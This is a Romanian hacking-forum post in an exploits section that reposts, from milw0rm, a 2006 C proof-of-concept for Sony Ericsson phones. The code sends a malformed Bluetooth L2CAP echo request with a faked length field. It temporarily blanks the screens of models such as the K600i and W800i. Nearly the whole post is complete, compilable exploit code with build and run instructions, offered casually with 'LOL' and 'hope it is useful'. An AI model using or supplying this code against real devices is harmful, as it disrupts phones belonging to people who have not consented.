Jump to content
phantomas

Sony/Ericsson BlueTooth ( reset display )

By phantomas, in Exploituri

Recommended Posts

phantomas Newbie

phantomas

Posted
Posted

LOL !!! ( luat de pe milworm ) 

/* Sony/Ericsson reset display - PoC */

/* Pierre BETOUIN - [email]pierre.betouin@infratech.fr[/email] */

/* 05-02-2006 */

/* Vulnerability found using BSS fuzzer : */

/* Download [url]www.secuobs.com/news/05022006-bluetooth10.shml[/url] */

/* */

/* Causes anormal behaviours on some Sony/Ericsson */

/* cell phones */

/* Vulnerable tested devices : */

/* - K600i */

/* - V600i */

/* - K750i */

/* - W800i */

/* - And maybe other ones... */

/* */

/* Vulnerable devices will slowly turn their screen into */

/* black and then display a white screen. */

/* After a short period (~45sec), they will go back to */

/* their normal behaviour */

/* */

/* gcc -lbluetooth reset_display_sonyericsson.c */

/* -o reset_display_sonyericsson */

/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */



#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <bluetooth/bluetooth.h>

#include <bluetooth/hci.h>

#include <bluetooth/l2cap.h>



#define SIZE 4

#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header)



int main(int argc, char **argv)

{

char *buffer;

l2cap_cmd_hdr *cmd;

struct sockaddr_l2 addr;

int sock, sent, i;



if(argc < 2)

{

fprintf(stderr, "%s <btaddr>n", argv[0]);

exit(EXIT_FAILURE);

}



if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)

{

perror("socket");

exit(EXIT_FAILURE);

}



memset(&addr, 0, sizeof(addr));

addr.l2_family = AF_BLUETOOTH;



if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)

{

perror("bind");

exit(EXIT_FAILURE);

}



str2ba(argv[1], &addr.l2_bdaddr);



if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)

{

perror("connect");

exit(EXIT_FAILURE);

}



if(!(buffer = (char *) malloc ((int) SIZE + 1)))

{

perror("malloc");

exit(EXIT_FAILURE);

}



memset(buffer, 90, SIZE);



cmd = (l2cap_cmd_hdr *) buffer;

cmd->code = L2CAP_ECHO_REQ;

cmd->ident = 1;

cmd->len = FAKE_SIZE;



if( (sent=send(sock, buffer, SIZE, 0)) >= 0)

{

printf("L2CAP packet sent (%d)n", sent);

}



printf("Buffer:t");

for(i=0; i<sent; i++)

printf("%.2X ", (unsigned char) buffer[i]);

printf("n");



free(buffer);

close(sock);

return EXIT_SUCCESS;

}



// milw0rm.com [2006-02-06]







sper sa fie de folos

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...